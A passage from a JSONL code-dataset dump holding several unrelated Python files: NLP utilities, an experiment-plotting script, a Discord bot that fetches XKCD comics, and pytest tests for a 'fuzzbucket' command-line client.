25:\r\n chars = chars + [ELMO_PAD_CHAR] * (25 - len(chars))\r\n\r\n charIds = [int(x) for x in chars]\r\n return charIds\r\n\r\ndef words2chars(words):\r\n return [Word2CharIds(word) for word in words]\r\n\r\nimport os\r\nimport sys\r\nsys.path.append('/home/nlp/shared')\r\n#from hutils import DBG\r\n\r\nglove_vocab = {}\r\n\r\ndef load_glove_vocabulary(opt):\r\n global glove_vocab\r\n vocabulary = set()\r\n base_fname = opt['trainer']['glove_file'].replace('.txt', '')\r\n glove_vocab = {}\r\n # try to fast load\r\n if os.path.isfile(base_fname + '.vocab.txt'):\r\n with open(base_fname + '.vocab.txt', 'r', encoding=\"utf8\") as f:\r\n for line in f:\r\n vline = line.strip().split()\r\n if len(vline) != 2:\r\n continue\r\n token, offs = vline\r\n glove_vocab[token] = offs\r\n vocabulary = set(glove_vocab.keys())\r\n else:\r\n with open(opt['trainer']['glove_file'], 'rb') as f:\r\n offs = 0\r\n for line in f:\r\n elems = line.decode('utf8').strip().split()\r\n token = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n vocabulary.add(token)\r\n glove_vocab[token] = offs\r\n offs += len(line)\r\n # memoize list of words and offsets\r\n with open(base_fname + '.vocab.txt', 'w', encoding=\"utf8\") as f:\r\n for token, offs in glove_vocab.items():\r\n f.write(token + ' ' + str(offs) + '\\n')\r\n return vocabulary\r\n\r\n#def load_glove_vocabulary(opt):\r\n# vocabulary = set()\r\n# with open(opt['trainer']['glove_file'], encoding=\"utf8\") as f:\r\n# for line in f:\r\n# elems = line.split()\r\n# token = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n# vocabulary.add(token)\r\n# return vocabulary\r\n\r\ndef build_embeddings(opt, vocabulary):\r\n vocabulary_size = len(vocabulary['words'])\r\n embeddings = np.random.uniform(-1, 1, (vocabulary_size, opt['trainer']['glove_dim']))\r\n embeddings[0] = 0 # should be all 0 (using broadcast)\r\n\r\n with open(opt['trainer']['glove_file'], encoding=\"utf8\") as f:\r\n # fast load embeddings\r\n for token in vocabulary['words']:\r\n if token in glove_vocab:\r\n offs = int(glove_vocab[token])\r\n f.seek(offs)\r\n line = f.readline().strip()\r\n elems = line.split()\r\n token2 = normalize_text(''.join(elems[0:-opt['trainer']['glove_dim']]))\r\n assert token == token2\r\n if token in vocabulary['words']:\r\n embeddings[vocabulary['words'][token]['id']] = [float(v) for v in elems[-opt['trainer']['glove_dim']:]]\r\n return embeddings\r\n\r\nlast_timestamp = None\r\ndef time_delta():\r\n global last_timestamp\r\n now = datetime.datetime.now()\r\n now_str = re.sub(r'\\.[0-9]+$', '', str(now))\r\n if last_timestamp == None:\r\n delta = ''\r\n else:\r\n delta = now - last_timestamp\r\n delta = ' [delta=' + str(delta.seconds)+'s]'\r\n last_timestamp = now\r\n return now_str + delta\r\n\r\ndef levenshtein(s1, s2):\r\n if len(s1) < len(s2):\r\n return levenshtein(s2, s1)\r\n\r\n # len(s1) >= len(s2)\r\n if len(s2) == 0:\r\n return len(s1)\r\n\r\n previous_row = range(len(s2) + 1)\r\n for i, c1 in enumerate(s1):\r\n current_row = [i + 1]\r\n for j, c2 in enumerate(s2):\r\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\r\n deletions = current_row[j] + 1 # than s2\r\n substitutions = previous_row[j] + (c1 != c2)\r\n current_row.append(min(insertions, deletions, substitutions))\r\n previous_row = current_row\r\n \r\n return previous_row[-1]\r\n\r\ndef levenshtein_score(a, b, threshold=0):\r\n if len(a) == 0 and len(b) == 0: return 1\r\n score = (max(len(a), len(b)) - levenshtein(a.lower(), b.lower()))/max(len(a), len(b))\r\n if score < threshold: score = 0\r\n return score\r\n\r\ndef is_valid_date(date_string, use_dateparser=True):\r\n if get_date(date_string) is None:\r\n return False \r\n return True\r\n\r\ndef get_date(date_string, base_date=None, use_dateParser=True): \r\n if base_date is None:\r\n base_date = datetime.datetime.now()\r\n\r\n try:\r\n date = parser.parse(date_string, default = base_date)\r\n if date is not None:\r\n return date\r\n except: \r\n pass \r\n \r\n if use_dateParser:\r\n try: \r\n date = dateparser.parse(date_string, settings={'STRICT_PARSING': True,'RELATIVE_BASE':base_date}, languages=[\"en\"]) \r\n if date is not None:\r\n return date\r\n except: \r\n pass \r\n\r\n return None\r\n","sub_path":"PyTest/Common/nlputil.py","file_name":"nlputil.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1864563","text":"import pandas as pd\nimport numpy as np\nimport os\nimport matplotlib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use(\"seaborn\")\nfrom pypet import Trajectory\nimport itertools as it\nfrom matplotlib.lines import Line2D\n\nRESULTS_PATH = \"/home/simon/Documents/NAIVI/results/\"\nFIGS_PATH = \"/home/simon/Documents/NAIVI/results/figs/\"\nEXP_NAME = \"optimizer\"\n\ntraj = Trajectory(EXP_NAME, add_time=False)\ntraj.f_load(filename=RESULTS_PATH + EXP_NAME + \".hdf5\", force=True)\ntraj.v_auto_load = True\n\nparms = traj.res.summary.hyperparameters.df\nns = parms[(\"data\", \"N\")].unique()\nps = parms[(\"data\", \"p_cts\")].unique()\nexps = list(it.product(ns, ps))\noptimizers = parms[(\"fit\", \"optimizer\")].unique()\ncols = [matplotlib.colors.to_hex(col) for col in sns.color_palette(\"Set2\", len(optimizers))]\ncolors = {\n name: col for name, col in zip(optimizers, cols)\n}\nmetrics = {\n (\"train\", \"loss\"): \"(Training loss - min)/min\",\n (\"train\", \"grad_Linfty\"): \"Linfty(grad)\",\n (\"train\", \"grad_L1\"): \"L1(grad)\",\n (\"train\", \"grad_L2\"): \"L2(grad)\",\n (\"train\", \"mse\"): \"(Training MSE - min)/min\",\n (\"train\", \"auc_A\"): \"(max - Training AUC)\",\n (\"error\", \"BBt\"): \"MSE(BBt)\",\n (\"error\", \"Theta_X\"): \"MSE(Theta_X)\",\n (\"error\", \"ZZt\"): \"MSE(ZZt)\",\n (\"error\", \"alpha\"): \"MSE(alpha)\",\n (\"error\", \"Theta_A\"): \"MSE(Theta_A)\",\n (\"error\", \"P\"): \"MSE(P)\",\n}\n\n# Plot\nfig, axs = plt.subplots(len(metrics), len(exps), figsize=(15, 20), sharey=\"row\", sharex=\"col\")\nfor col, (N, p_cts) in enumerate(exps):\n\truns = parms.loc[(parms[(\"data\", \"N\")]==N) & (parms[(\"data\", \"p_cts\")]==p_cts)].index\n\tmin_loss = np.inf\n\tmin_mse = np.inf\n\tmax_auc = 0.\n\tfor idx in runs:\n\t\ttraj.f_set_crun(idx)\n\t\tmin_loss = min(min_loss, traj.res.logs.crun.df[(\"train\", \"loss\")].min())\n\t\tmin_mse = min(min_mse, traj.res.logs.crun.df[(\"train\", \"mse\")].min())\n\t\tmax_auc = max(max_auc, traj.res.logs.crun.df[(\"train\", \"auc_A\")].max())\n\tfor row, (metric, display) in enumerate(metrics.items()):\n\t\tax = axs[row][col]\n\t\tfor idx in runs:\n\t\t\ttraj.f_set_crun(idx)\n\t\t\tm = traj.res.logs.crun.df[metric]\n\t\t\tif metric == (\"train\", \"loss\"):\n\t\t\t\tm = (m - min_loss) / min_loss\n\t\t\tif metric == (\"train\", \"mse\"):\n\t\t\t\tm = (m - min_mse) / min_mse\n\t\t\tif metric == (\"train\", \"auc_A\"):\n\t\t\t\tm = max_auc - m\n\t\t\tax.plot(m, color=colors[parms.loc[idx, (\"fit\", \"optimizer\")]])\n\t\tif col == 0:\n\t\t\tax.set_yscale(\"log\")\n\t\t\tax.set_ylabel(display)\n\taxs[-1][col].set_xscale(\"log\")\n\taxs[0][col].set_title(f\"N={N}, p={p_cts}\")\n# legend\nlines = [Line2D([0], [0], color=col, linestyle=\"-\")\n for _, col in colors.items()]\nlabels = colors.keys()\nfig.legend(lines, labels, loc=8, ncol=len(colors))\nfig.tight_layout()\nfig.subplots_adjust(bottom=0.05)\nfig.savefig(FIGS_PATH + \"optimizer.pdf\")\n","sub_path":"NAIVI_experiments/analysis/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92664697","text":"import json\nimport urllib.request as ureq\nimport discord, asyncio, random, datetime, difflib\nfrom src.utils import Log, ErrorHandler\nfrom src.loadingmessage import LoadingMessage\n\nclass xkcd:\n def __init__(self, num = ''): \n if num.lower() == 'random':\n self.num = random.randrange(1, xkcd('').num)\n elif str(num).isnumeric() or num == '':\n self.num = num\n elif num.lower() == 'latest':\n self.num = xkcd('').num\n else:\n raise ValueError\n \n self.url = 'https://xkcd.com/' + str(self.num)\n \n mdata = json.load(ureq.urlopen(self.url + '/info.0.json'))\n self.date = datetime.datetime(int(mdata['year']), int(mdata['month']), int(mdata['day']))\n self.img_url = mdata['img']\n self.title = mdata['title']\n self.alt = mdata['alt']\n self.num = mdata['num']\n\nclass XKCDSearch:\n @staticmethod\n async def search(bot, ctx, searchQuery, message):\n errorCount = 0\n while errorCount <= 1:\n try:\n x = xkcd(searchQuery)\n embed = discord.Embed(title=x.title, description=x.alt, timestamp=x.date)\n embed.url = x.url\n embed.set_image(url=x.img_url)\n embed.set_footer(text=f\"Requested by {ctx.author}\")\n\n await message.edit(content=None, embed=embed)\n Log.appendToLog(ctx, f\"{ctx.command} result\", x.url)\n\n await message.add_reaction('🗑️')\n reaction, user = await bot.wait_for(\"reaction_add\", check=lambda reaction, user: all([user == ctx.author, str(reaction.emoji) == \"🗑️\", reaction.message == message]), timeout=60)\n if str(reaction.emoji) == '🗑️':\n await message.delete()\n return\n\n except UserCancel as e:\n await ctx.send(f\"Cancelled\")\n return\n\n except ValueError:\n errorMsg = await ctx.send(\"Invalid input, an XKCD comic number is needed. Please edit your search or try again.\")\n\n messageEdit = asyncio.create_task(bot.wait_for('message_edit', check=lambda var, m: m.author == ctx.author, timeout=60))\n reply = asyncio.create_task(bot.wait_for('message', check=lambda m: m.author == ctx.author, timeout=60))\n \n waiting = [messageEdit, reply]\n done, waiting = await asyncio.wait(waiting, return_when=asyncio.FIRST_COMPLETED) # 30 seconds wait either reply or react\n if messageEdit in done:\n reply.cancel()\n messageEdit = messageEdit.result()\n searchQuery = ''.join([li for li in difflib.ndiff(messageEdit[0].content, messageEdit[1].content) if '+' in li]).replace('+ ', '')\n elif reply in done:\n messageEdit.cancel()\n reply = reply.result()\n await reply.delete()\n \n if reply.content == \"cancel\":\n messageEdit.cancel()\n reply.cancel()\n break\n else: searchQuery = reply.content\n await errorMsg.delete()\n errorCount += 1\n continue\n\n except asyncio.TimeoutError:\n return\n \n except asyncio.CancelledError:\n pass\n\n except Exception as e:\n await ErrorHandler(bot, ctx, e, searchQuery)\n return\n\nclass UserCancel(Exception):\n pass\n","sub_path":"src/xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"23774980","text":"import argparse\nimport contextlib\nimport io\nimport json\nimport logging\nimport os\nimport random\nimport re\nimport urllib.request\n\nimport pytest\n\nimport fuzzbucket_client.__main__\n\n\n@pytest.fixture(autouse=True)\ndef config_setup(tmpdir, monkeypatch):\n url = f\"http://fuzzbucket.example.org/bleep/bloop/dev/{random.randint(42, 666)}\"\n fake_home = tmpdir.join(\"home\")\n fake_home.mkdir().mkdir(\".cache\").mkdir(\"fuzzbucket\").join(\n \"credentials\"\n ).write_text(f'[server \"{url}\"]\\ncredentials = whimsy:doodles\\n', \"utf-8\")\n monkeypatch.setenv(\"HOME\", str(fake_home))\n monkeypatch.setenv(\"FUZZBUCKET_URL\", url)\n\n\ndef test_default_client():\n assert fuzzbucket_client.__main__.default_client() is not None\n\n\ndef test_client_setup():\n client = fuzzbucket_client.__main__.Client()\n client._setup()\n assert client is not None\n\n client._env.pop(\"FUZZBUCKET_URL\")\n with pytest.raises(ValueError):\n client._setup()\n\n client._env[\"FUZZBUCKET_URL\"] = \"not none\"\n client._cached_credentials = None\n os.remove(client._credentials_file)\n with pytest.raises(ValueError):\n client._setup()\n\n\ndef gen_fake_urlopen(response, http_exc=None, empty_methods=()):\n @contextlib.contextmanager\n def fake_urlopen(request):\n if request.get_method() in empty_methods:\n yield io.StringIO(\"\")\n return\n if http_exc is not None:\n raise urllib.request.HTTPError(*(list(http_exc) + [response]))\n yield response\n\n return fake_urlopen\n\n\n@pytest.mark.parametrize(\n (\"errors\", \"log_level\", \"log_matches\", \"out_matches\", \"expected\"),\n [\n pytest.param((), logging.INFO, (), (), True, id=\"happy\"),\n pytest.param(\n (\"setup\",),\n logging.INFO,\n (\"command.+failed err=.+setup error\",),\n (),\n False,\n id=\"setup_err\",\n ),\n pytest.param(\n (\"setup_auth\",),\n logging.INFO,\n (\n \"command.+failed err=No credentials found for \"\n + \"url='http://nope' in file='/some/hecking/place'\",\n ),\n (\n \"^Please run the following command\",\n \"to grant access to Fuzzbucket\",\n \"fuzzbucket-client login\",\n ),\n False,\n id=\"setup_auth_err\",\n ),\n pytest.param(\n (\"method\",),\n logging.INFO,\n (\"command.+failed err=.+method error\",),\n (),\n False,\n id=\"method_err\",\n ),\n pytest.param(\n (\"http\",),\n logging.INFO,\n (\"command.+failed err=.+http error\",),\n (),\n False,\n id=\"http_err\",\n ),\n pytest.param(\n (\"http_auth\",),\n logging.INFO,\n (\"command.+failed err=.+http_auth error\",),\n (\n \"^Please run the following command\",\n \"to grant access to Fuzzbucket\",\n \"fuzzbucket-client login\",\n ),\n False,\n id=\"http_auth_err\",\n ),\n pytest.param(\n (\"http\", \"json\"),\n logging.INFO,\n (\"command.+failed err=.+json error\",),\n (),\n False,\n id=\"http_json_err\",\n ),\n pytest.param(\n (\"http\", \"json\"),\n logging.DEBUG,\n (\n \"command.+failed\",\n \"Traceback \\\\(most recent call last\\\\):\",\n \"ValueError: json error\",\n ),\n (),\n False,\n id=\"http_json_err\",\n ),\n ],\n)\ndef test_command_decorator(\n monkeypatch, caplog, capsys, errors, log_level, log_matches, out_matches, expected\n):\n class FakeClient:\n def _setup(self):\n if \"setup_auth\" in errors:\n raise fuzzbucket_client.__main__.CredentialsError(\n \"http://nope\", \"/some/hecking/place\"\n )\n if \"setup\" in errors:\n raise ValueError(\"setup error\")\n\n def fake_method(self, known_args, unknown_args):\n if \"method\" in errors:\n raise ValueError(\"method error\")\n if \"http\" in errors:\n raise urllib.request.HTTPError(\"http://nope\", 599, \"ugh\", [], None)\n if \"http_auth\" in errors:\n raise urllib.request.HTTPError(\"http://nope\", 403, \"no\", [], None)\n return True\n\n def fake_load(fp):\n if \"json\" in errors:\n raise ValueError(\"json error\")\n if \"http_auth\" in errors:\n return {\"error\": \"http_auth error\"}\n return {\"error\": \"http error\"}\n\n caplog.set_level(log_level)\n monkeypatch.setattr(fuzzbucket_client.__main__, \"log_level\", lambda: log_level)\n monkeypatch.setattr(json, \"load\", fake_load)\n decorated = fuzzbucket_client.__main__._command(fake_method)\n assert decorated(FakeClient(), \"known\", \"unknown\") == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text) is not None\n captured = capsys.readouterr()\n for out_match in out_matches:\n assert re.search(out_match, captured.out, re.MULTILINE) is not None\n\n\ndef test_client_version(capsys):\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"--version\"])\n assert ret == 0\n captured = capsys.readouterr()\n assert re.match(\"fuzzbucket-client .+\", captured.out) is not None\n\n\ndef test_client_no_func(capsys):\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\"])\n assert ret == 2\n captured = capsys.readouterr()\n for match in (\n \"^usage: .+--version.+\",\n \"^A client for fuzzbucket\",\n \"^optional arguments:\",\n \"^ +delete-alias.+delete an image alias\",\n ):\n assert re.search(match, captured.out, re.MULTILINE) is not None\n\n\ndef test_client_failing_func(monkeypatch, capsys):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(client, \"list\", lambda _, __: False)\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"list\"])\n assert ret == 86\n\n\n@pytest.mark.parametrize(\n (\"args\",),\n [\n pytest.param((\"list\",), id=\"empty\"),\n pytest.param((\"-j\", \"list\"), id=\"output_json\"),\n ],\n)\ndef test_client_list(monkeypatch, args):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(\n json.dumps({\"boxes\": [{\"name\": \"sparkles\", \"fancy\": \"probably\"}]})\n )\n ),\n )\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\"] + list(args))\n assert ret == 0\n\n\n@pytest.mark.parametrize(\n (\"user\", \"secrets\", \"url\", \"raises\", \"written\", \"expected\"),\n [\n pytest.param(\n \"bugs\",\n (\"wonketywoopwoopwoopwoopwoopwoopwoopwoopwoo\",),\n \"http://sure.example.org\",\n False,\n (\"bugs\", \"wonketywoopwoopwoopwoopwoopwoopwoopwoopwoo\"),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n \"elmer\",\n (\":typing:\", \"9ccb489abe5c900316fd57482b23c38bb99c727900\"),\n \"https://vewwyquiet.jobs\",\n False,\n (\"elmer\", \"9ccb489abe5c900316fd57482b23c38bb99c727900\"),\n 0,\n id=\"eventually_happy\",\n ),\n pytest.param(\n \"wylie\",\n (\"femmeroadrunner???\",),\n \"https://shop.acme.com\",\n True,\n (),\n 86,\n id=\"interrupted\",\n ),\n pytest.param(\n \"speedy\", (\"I am more than a stereotype\",), None, False, (), 86, id=\"no_url\"\n ),\n ],\n)\ndef test_client_login(\n monkeypatch, capsys, user, secrets, url, raises, written, expected\n):\n state = {\"secret_count\": 0}\n\n def fake_write_credentials(user, secret):\n state.update(user=user, secret=secret)\n\n def fake_getpass(prompt):\n state.update(prompt=prompt)\n ret = secrets[state[\"secret_count\"]]\n state[\"secret_count\"] += 1\n if raises:\n raise KeyboardInterrupt(\"control this\")\n return ret\n\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(fuzzbucket_client.__main__.webbrowser, \"open\", lambda u: None)\n monkeypatch.setattr(fuzzbucket_client.__main__.getpass, \"getpass\", fake_getpass)\n monkeypatch.setattr(client, \"_write_credentials\", fake_write_credentials)\n client._env[\"FUZZBUCKET_URL\"] = url\n\n ret = fuzzbucket_client.__main__.main([\"fuzzbucket-client\", \"login\", user])\n assert ret == expected\n captured = capsys.readouterr()\n if url is not None:\n assert \"Attempting to open the following URL\" in captured.out\n if len(secrets) > 1:\n assert \"Invalid secret provided\" in captured.out\n if raises or url is None:\n return\n assert (state.get(\"user\"), state.get(\"secret\")) == written\n assert \"Login successful\" in captured.out\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"ubuntu49\",\n \"public_ip\": None,\n \"special\": \"like all the others\",\n }\n ]\n },\n None,\n (\n \"ubuntu49\",\n \"--connect\",\n ),\n (\"created box for user=.+\",),\n 0,\n id=\"happy_alias\",\n ),\n pytest.param(\n {\n \"boxes\": [\n {\"name\": \"snowflek\", \"public_ip\": None, \"worth\": \"immeasurable\"}\n ]\n },\n None,\n (\"ami-fafbafabcadabfabcdabcbaf\", \"--instance-type=t8.nano\"),\n (\"created box for user=.+\",),\n 0,\n id=\"happy_ami\",\n ),\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"ubuntu49\",\n \"public_ip\": \"256.256.0.-1\",\n \"special\": \"like the one before\",\n }\n ]\n },\n (\n \"http://fake\",\n 409,\n \"you already did this\",\n [(\"Content-Type\", \"application/json\")],\n ),\n (\n \"ubuntu49\",\n \"--instance-type=t8.pico\",\n \"--connect\",\n ),\n (\"matching box already exists\",),\n 0,\n id=\"repeat_alias\",\n ),\n pytest.param(\n {\"error\": \"not today\"},\n (\n \"http://fake\",\n 500,\n \"just cannot\",\n [(\"Content-Type\", \"application/json\")],\n ),\n (\n \"ubuntu49\",\n \"--instance-type=t8.pico\",\n \"--connect\",\n ),\n (\"command [\\\"']create[\\\"'] failed\",),\n 86,\n id=\"api_err\",\n ),\n ],\n)\ndef test_client_create(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response)), http_exc=http_exc),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"create\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text) is not None\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"welp\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafafafaf\",\n \"special\": \"is this the end\",\n },\n {\n \"name\": \"welpington\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafababab\",\n },\n ]\n },\n None,\n (\"welp*\",),\n (\"deleted box for.+name=welp$\", \"deleted box for.+name=welpington$\"),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n {\"boxes\": []},\n None,\n (\"welp*\",),\n (\"no boxes found matching [\\\"']welp\\\\*[\\\"']\",),\n 86,\n id=\"no_match\",\n ),\n ],\n)\ndef test_client_delete(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(json.dumps(api_response)),\n http_exc=http_exc,\n empty_methods=(\"DELETE\",),\n ),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"delete\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text, re.MULTILINE)\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"http_exc\", \"cmd_args\", \"log_matches\", \"expected\"),\n [\n pytest.param(\n {\n \"boxes\": [\n {\n \"name\": \"zombie-skills\",\n \"public_ip\": None,\n \"instance_id\": \"i-fafafafafaf\",\n \"brainzzz\": \"eating\",\n }\n ]\n },\n None,\n (\"zombie-skills\",),\n (\"rebooted box for user=.+ box=[\\\"']zombie-skills[\\\"']\",),\n 0,\n id=\"happy\",\n ),\n pytest.param(\n {\"boxes\": []},\n None,\n (\"nessie\",),\n (\"no box found matching [\\\"']nessie[\\\"']\",),\n 86,\n id=\"no_match\",\n ),\n pytest.param(\n {\"error\": \"ker-splatz\"},\n (\"http://nah\", 586, \"owwie\", []),\n (\"whoopie-pie\",),\n (\"command [\\\"']reboot[\\\"'] failed err=[\\\"']ker-splatz[\\\"']\",),\n 86,\n id=\"api_err\",\n ),\n ],\n)\ndef test_client_reboot(\n monkeypatch, caplog, api_response, http_exc, cmd_args, log_matches, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(\n io.StringIO(json.dumps(api_response)),\n http_exc=http_exc,\n empty_methods=(\"POST\",),\n ),\n )\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"reboot\"] + list(cmd_args)\n )\n assert ret == expected\n for log_match in log_matches:\n assert re.search(log_match, caplog.text, re.MULTILINE)\n\n\ndef test_client_ssh(monkeypatch):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n def fake_execvp(file, args):\n assert file == \"ssh\"\n assert args == [\n \"ssh\",\n \"ethereal-plane.example.org\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-l\",\n \"ubuntu\",\n \"ls\",\n \"-la\",\n ]\n\n def fake_list_boxes():\n return [{\"name\": \"koolthing\", \"public_dns_name\": \"ethereal-plane.example.org\"}]\n\n monkeypatch.setattr(os, \"execvp\", fake_execvp)\n monkeypatch.setattr(client, \"_list_boxes\", fake_list_boxes)\n\n ret = fuzzbucket_client.__main__.main(\n [\"fuzzbucket-client\", \"ssh\", \"koolthing\", \"ls\", \"-la\"]\n )\n assert ret == 0\n\n\ndef test_client_scp(monkeypatch):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n def fake_execvp(file, args):\n assert file == \"scp\"\n assert args == [\n \"scp\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-r\",\n \"cornelius@ethereal-plane.example.org:/var/log/\",\n \"./local/dump\",\n ]\n\n def fake_list_boxes():\n return [{\"name\": \"koolthing\", \"public_dns_name\": \"ethereal-plane.example.org\"}]\n\n monkeypatch.setattr(os, \"execvp\", fake_execvp)\n monkeypatch.setattr(client, \"_list_boxes\", fake_list_boxes)\n\n ret = fuzzbucket_client.__main__.main(\n [\n \"fuzzbucket-client\",\n \"scp\",\n \"koolthing\",\n \"-r\",\n \"cornelius@__BOX__:/var/log/\",\n \"./local/dump\",\n ]\n )\n assert ret == 0\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"data_format\", \"stdout_match\", \"expected\"),\n [\n pytest.param(\n {\"image_aliases\": {\"chonk\": \"ami-fafababacaca\", \"wee\": \"ami-0a0a0a0a0a\"}},\n fuzzbucket_client.__main__._DataFormats.INI,\n \"(chonk = ami-fafababacaca|wee = ami-0a0a0a0a0a)\",\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"image_aliases\": {\"chonk\": \"ami-fafababacaca\", \"wee\": \"ami-0a0a0a0a0a\"}},\n fuzzbucket_client.__main__._DataFormats.JSON,\n '(\"chonk\": \"ami-fafababacaca\"|\"wee\": \"ami-0a0a0a0a0a\")',\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"error\": \"oh no\"},\n fuzzbucket_client.__main__._DataFormats.INI,\n None,\n False,\n id=\"err\",\n ),\n ],\n)\ndef test_client_list_aliases(\n monkeypatch, capsys, api_response, data_format, stdout_match, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response))),\n )\n client.data_format = data_format\n\n assert client.list_aliases(\"known\", \"unknown\") == expected\n if stdout_match is not None:\n captured = capsys.readouterr()\n assert re.search(stdout_match, captured.out) is not None\n\n\n@pytest.mark.parametrize(\n (\"api_response\", \"data_format\", \"stdout_match\", \"expected\"),\n [\n pytest.param(\n {\"image_aliases\": {\"blep\": \"ami-babacacafafa\"}},\n fuzzbucket_client.__main__._DataFormats.INI,\n \"blep = ami-babacacafafa\",\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"image_aliases\": {\"blep\": \"ami-babacacafafa\"}},\n fuzzbucket_client.__main__._DataFormats.JSON,\n '\"blep\": \"ami-babacacafafa\"',\n True,\n id=\"ok\",\n ),\n pytest.param(\n {\"error\": \"oh no\"},\n fuzzbucket_client.__main__._DataFormats.INI,\n None,\n False,\n id=\"err\",\n ),\n ],\n)\ndef test_client_create_alias(\n monkeypatch, capsys, api_response, data_format, stdout_match, expected\n):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO(json.dumps(api_response))),\n )\n client.data_format = data_format\n\n assert (\n client.create_alias(\n argparse.Namespace(alias=\"blep\", ami=\"ami-babacacafafa\"), \"unknown\"\n )\n == expected\n )\n if stdout_match is not None:\n captured = capsys.readouterr()\n assert re.search(stdout_match, captured.out) is not None\n\n\ndef test_client_delete_alias(monkeypatch, caplog):\n client = fuzzbucket_client.__main__.Client()\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(client, \"_urlopen\", gen_fake_urlopen(io.StringIO(\"\")))\n\n assert client.delete_alias(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n assert \"deleted alias\" in caplog.text\n\n\n@pytest.mark.parametrize(\n (\"data_format\", \"matches\"),\n [\n pytest.param(\n fuzzbucket_client.__main__._DataFormats.INI,\n [\"any = fields\", \"allowed = True\"],\n id=\"happy_ini\",\n ),\n pytest.param(\n fuzzbucket_client.__main__._DataFormats.JSON,\n ['\"any\": \"fields\"', '\"allowed\": true'],\n id=\"happy_json\",\n ),\n ],\n)\ndef test_client_get_key(monkeypatch, capsys, data_format, matches):\n client = fuzzbucket_client.__main__.Client()\n client.data_format = data_format\n monkeypatch.setattr(fuzzbucket_client.__main__, \"default_client\", lambda: client)\n\n monkeypatch.setattr(\n client,\n \"_urlopen\",\n gen_fake_urlopen(io.StringIO('{\"key\":{\"any\":\"fields\",\"allowed\":true}}')),\n )\n\n assert client.get_key(argparse.Namespace(alias=\"hurr\"), \"unknown\")\n\n captured = capsys.readouterr()\n for match in matches:\n 